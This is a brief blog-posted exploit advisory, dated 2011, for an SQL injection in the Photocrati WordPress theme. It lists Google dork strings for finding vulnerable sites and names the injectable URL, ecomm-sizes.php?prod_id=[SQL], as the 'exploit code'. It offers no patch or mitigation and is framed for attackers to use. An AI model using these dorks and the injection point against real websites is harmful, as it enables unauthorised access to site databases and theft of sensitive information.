wordpress theme photocrati 4.X.X SQL INJECTION
Posted by CoderX on 9:30 AM
# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ] # Google Dork: [ Designed by Photocrati ] also [powered by Photocrati] # Date: [23 / 09 / 2011 ] # Exploit Author: [ ayastar ] # Email : dmx-ayastar@hotmail.fr # Software Link: [ http://www.photocrati.com ] # Version: [4.X.X] # Tested on: [ windows 7 ]
details | ======================================================= Software : photocrati version : 4.X.X Risk : High remote : yes attacker can do a remote injection in site URL to get some sensitive information . =======================================================
Exploit code : http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]
Google Dork-> index of /ecomm-sizes.php?prod_id=